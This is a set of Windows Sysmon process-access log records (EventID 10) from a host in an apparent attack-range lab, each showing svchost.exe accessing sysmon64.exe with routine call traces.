{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1433,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.677\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.677","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1434,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.677\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.677","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1435,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.677\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.677","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1436,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.677\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.677","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1437,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.677\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.677","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1438,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.677\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.677","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1439,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.677\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.677","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1440,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.677\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.677","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
